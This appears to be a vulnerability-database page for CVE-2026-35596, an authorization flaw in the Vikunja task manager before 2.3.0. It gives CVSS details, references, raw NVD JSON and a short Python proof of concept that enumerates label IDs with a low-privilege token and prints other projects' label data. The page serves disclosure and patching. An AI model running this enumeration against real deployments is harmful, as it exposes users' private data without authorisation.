Security Vulnerability Report
CVE-2026-35596 CVSS 4.3 MEDIUM

Published: 2026-04-10 17:17:03
Last Modified: 2026-04-17 22:00:04

Description

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed. This vulnerability is fixed in 2.3.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit for CVE-2026-35596
# Description: PoC to demonstrate information disclosure via SQL operator precedence.
# Requires: Valid authentication token (low-privilege user).
target_url = "http://localhost:3456/api/v1/labels"
auth_token = "YOUR_LOW_PRIVILEGE_TOKEN_HERE"
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json",
}

# Enumerate potential label IDs.
# In a real scenario, an attacker might guess IDs or use a specific endpoint to list them if available.
# The vulnerability allows reading details of labels associated with tasks visible to the user,
# even if the user does not have access to the project the label belongs to.
for label_id in range(1, 100):
    response = requests.get(f"{target_url}/{label_id}", headers=headers)
    if response.status_code == 200:
        data = response.json()
        # created_by may be absent from the response; guard before indexing into it.
        created_by = data.get("created_by") or {}
        print(f"[+] Label ID {label_id} accessed:")
        print(f"    Title: {data.get('title')}")
        print(f"    Description: {data.get('description')}")
        print(f"    Created By: {created_by.get('username')}")
    elif response.status_code == 404:
        continue
    else:
        print(f"[-] Error accessing ID {label_id}: {response.status_code}")
```

References

- https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1 (Patch)
- https://github.com/go-vikunja/vikunja/pull/2578 (Issue Tracking)
- https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0 (Release Notes)
- https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35596",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T17:17:03.067",
    "lastModified": "2026-04-17T22:00:03.637",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed. This vulnerability is fixed in 2.3.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.3.0",
                "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/go-vikunja/vikunja/pull/2578", "source": "[email protected]", "tags": ["Issue Tracking"]},
      {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}
```